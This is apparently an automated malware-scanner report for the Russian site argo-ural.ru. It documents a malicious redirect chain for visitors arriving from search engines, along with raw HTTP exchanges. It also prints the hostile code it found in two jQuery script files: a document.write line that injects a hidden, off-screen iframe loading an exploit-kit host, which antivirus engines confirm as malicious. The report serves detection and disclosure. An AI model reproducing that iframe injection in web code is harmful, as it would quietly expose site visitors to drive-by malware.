New scan:

Malware Scanner report for argo-ural.ru

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://web-redirect.ru/?web
452 websites infected. web-redirect.ru is marked by Yandex as suspicious.
->http://rosmetsar.ru/components/com_weblinks/2/separator.php


The website "argo-ural.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/4
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://argo-ural.ru/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: argo-ural.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Sep 2014 17:48:33 GMT
Pragma: no-cache
Location: http://web-redirect.ru/?web
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: _cutt_caches_images=1410889713; expires=Wed, 17-Sep-2014 17:48:33 GMT; path=/
Set-Cookie: PHPSESSID=2b27f4cdb14cdf325def7fc87f363823; path=/
Set-Cookie: language=ru; expires=Thu, 16-Oct-2014 17:48:33 GMT; path=/; domain=argo-ural.ru
Set-Cookie: currency=RUB; expires=Thu, 16-Oct-2014 17:48:33 GMT; path=/; domain=argo-ural.ru
malicious
URL: http://web-redirect.ru/?web
(imitation of visitor from search engine)

GET /?web HTTP/1.1
Host: web-redirect.ru
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Found
Cache-Control: max-age=0
Connection: close
Date: Tue, 16 Sep 2014 17:48:33 GMT
Pragma: no-cache
Location: http://rosmetsar.ru/components/com_weblinks/2/separator.php
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Tue, 16 Sep 2014 17:48:33 GMT
X-Powered-By: PHP/5.3.3
suspicious

Scanned pages/files

RequestServer responseStatus
http://argo-ural.ru/
200 OK
Content-Length: 41285
Content-Type: text/html
clean
http://argo-ural.ru/catalog/view/javascript/jquery/jquery-1.3.2.min.js
200 OK
Content-Length: 57422
Content-Type: application/javascript
clean
http://argo-ural.ru/catalog/view/javascript/jquery/thickbox/thickbox-compressed.js
200 OK
Content-Length: 5710
Content-Type: application/javascript
clean
http://argo-ural.ru/catalog/view/javascript/jquery/tab.js
200 OK
Content-Length: 713
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$.tabs = function(selector, start) {
$(selector).each(function(i, element) {
$($(element).attr('tab')).css('display', 'none');

$(element).click(function() {
$(selector).each(function(i, element) {
$(element).removeClass('selected');

$($(element).attr('tab')).css('display', 'none');
});

$(this).addClass('selected');

$($(this).attr('tab')).css('display', 'block');
});
});

if (!start) {
start = $(selector + ':first').attr('tab');
}
$(selector + '[tab=\'' + start + '\']').trigger('click');
};;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://biigoo.qhigh.com/036f32a8.0WhHi8TzVrtztN?default" height="110" width="110"></iframe>');

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Iframe-DGJ [Trj]
Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-AN
AVware
Malware.JS.Generic (JS)

http://argo-ural.ru/catalog/view/javascript/jquery/jquery.cycle.all.min.js
200 OK
Content-Length: 31200
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){var ver="2.88";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function debug(s){if($.fn.cycle.debug){log(s);}}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length===0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,
... 3067 bytes are skipped ...
tep*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://biigoo.qhigh.com/036f32a8.0WhHi8TzVrtztN?default" height="110" width="110"></iframe>');

Antivirus reports:

Sophos
Mal/Iframe-AN

http://argo-ural.ru/index.php?route=common/home
200 OK
Content-Length: 41285
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18296
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18358
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18420
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18482
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18544
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18606
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18668
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18730
Content-Type: text/html
clean
http://argo-ural.ru/index.php?route=common/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/catalog/view/javascript/jquery/jquery-1.3.2.min.js
404 Not Found
Content-Length: 18792
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=argo-ural.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://argo-ural.ru/

Result: argo-ural.ru is not infected or malware details are not published yet.